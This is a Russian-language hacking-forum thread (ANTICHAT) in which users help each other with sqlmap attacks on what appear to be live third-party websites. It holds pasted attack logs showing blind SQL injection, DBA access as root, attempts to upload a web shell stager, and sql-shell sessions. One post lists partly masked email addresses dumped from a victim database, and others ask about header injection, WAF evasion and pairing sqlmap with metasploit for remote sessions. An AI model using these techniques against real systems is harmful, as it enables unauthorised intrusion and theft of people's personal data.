ANTICHAT — форум по информационной безопасности, OSINT и технологиям

кто сталкивался с таким? http://prntscr.com/svuovq

уязвимость типа boolean-based blind

открывается бд ,но не полностью ,открывает часть таблицы,а дальше вот это

[14:29:22] [INFO] retrieving the length of query output

[14:29:22] [INFO] retrieved:

[14:29:26] [INFO] retrieved:

[14:29:30] [INFO] retrieving the length of query output

[14:29:30] [INFO] retrieved:

[14:29:33] [INFO] retrieved:

[14:29:36] [INFO] retrieving the length of query output

[14:29:36] [INFO] retrieved:

[14:29:40] [INFO] retrieved:

[14:29:44] [INFO] retrieving the length of query output

[14:29:44] [INFO] retrieved:

[14:29:47] [INFO] retrieved:

[14:29:50] [INFO] retrieving the length of query output

[14:29:50] [INFO] retrieved:

[14:29:53] [INFO] retrieved:

[14:29:57] [INFO] retrieving the length of query output

[14:29:57] [INFO] retrieved:

[14:30:00] [INFO] retrieved:

[14:30:04] [INFO] retrieving the length of query output

[14:30:04] [INFO] retrieved:

[14:30:07] [INFO] retrieved:

[14:30:11] [INFO] retrieving the length of query output

[14:30:11] [INFO] retrieved:

Попробуй с --hex

Уязвимость в заголовке

Как правильно вставить в sqlmap?

--headers="Origin:*" не прокатывает

подскажите сливает в таком формате

***te89@gmail.co.uk

***slav.stojanov@outlook.com

***eneellis73@gmail.com

***chan@yahoo.com

из за чего так?

надо ставить оригинальный параметр. ты ставишь или пустой или уже разкрученый параметр да и в целом надо проверять ручками есть ли вообще то там дырка.

Parameter: #1* (URI)

Type: boolean-based blind

Title: Boolean-based blind - Parameter replace (original value)

Type: error-based

Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Type: stacked queries

Title: MySQL >= 5.0.12 stacked queries (comment)

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

[04:43:21] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0

[04:43:21] [INFO] testing if current user is DBA

[04:43:21] [INFO] fetching current user

[04:43:22] [INFO] retrieved: 'root@localhost'

current user is DBA: True

не возможно залить шелл

[04:44:04] [WARNING] unable to upload the file stager on '/var/www/'

[04:44:04] [INFO] trying to upload the file stager on '/var/www/menu/-1/' via LIMIT 'LINES TERMINATED BY' method

Не получается ничего.

[04:45:04] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0

[04:45:04] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER

sql-shell>

[04:00:51] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported

Подскажите пожалуйста что можно сделать ???

Parameter: #1* (URI)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: http://site.com:80/Help/HelpIndex.html?HelpName=Earn money&ThemeID=17 AND 2864=2864

---

[16:58:45] [INFO] testing MySQL

[16:58:45] [WARNING] the back-end DBMS is not MySQL

[16:58:45] [INFO] testing Oracle

[16:58:45] [WARNING] the back-end DBMS is not Oracle

[16:58:45] [INFO] testing PostgreSQL

[16:58:45] [WARNING] the back-end DBMS is not PostgreSQL

[16:58:45] [INFO] testing Microsoft SQL Server

[16:58:45] [WARNING] the back-end DBMS is not Microsoft SQL Server

[16:58:45] [INFO] testing SQLite

[16:58:45] [WARNING] the back-end DBMS is not SQLite

[16:58:45] [INFO] testing Microsoft Access

[16:58:45] [WARNING] the back-end DBMS is not Microsoft Access

[16:58:45] [INFO] testing Firebird

[16:58:45] [WARNING] the back-end DBMS is not Firebird

[16:58:45] [INFO] testing SAP MaxDB

[16:58:45] [WARNING] the back-end DBMS is not SAP MaxDB

[16:58:45] [INFO] testing Sybase

[16:58:45] [WARNING] the back-end DBMS is not Sybase

[16:58:45] [INFO] testing IBM DB2

[16:58:45] [WARNING] the back-end DBMS is not IBM DB2

[16:58:45] [INFO] testing HSQLDB

[16:58:45] [WARNING] the back-end DBMS is not HSQLDB

[16:58:45] [INFO] testing H2

[16:58:45] [WARNING] the back-end DBMS is not H2

[16:58:45] [INFO] testing Informix

[16:58:45] [WARNING] the back-end DBMS is not Informix

[16:58:45] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system
[*] ending @ 16:58:45 /2020-06-28/

Кто сталкивался? В чем проблема?

На соседнем борде обсуждали что типа одна скуля не отдает DBMS а вторая может и отдать.. Ищи еще скули на сайте

Так же грешат на WAF и предполагают что тип уязвимости - NoSQL Потому и не может определить dbms

Взаимодействие sqlmap и metasploit - что не так?

Дампит нормально а коннект отказывается создавать , все пути прописаны правильно...

Гугл поиск по запросу "unable to prompt for an out-of-band session" ничего не выдал вразумительного ..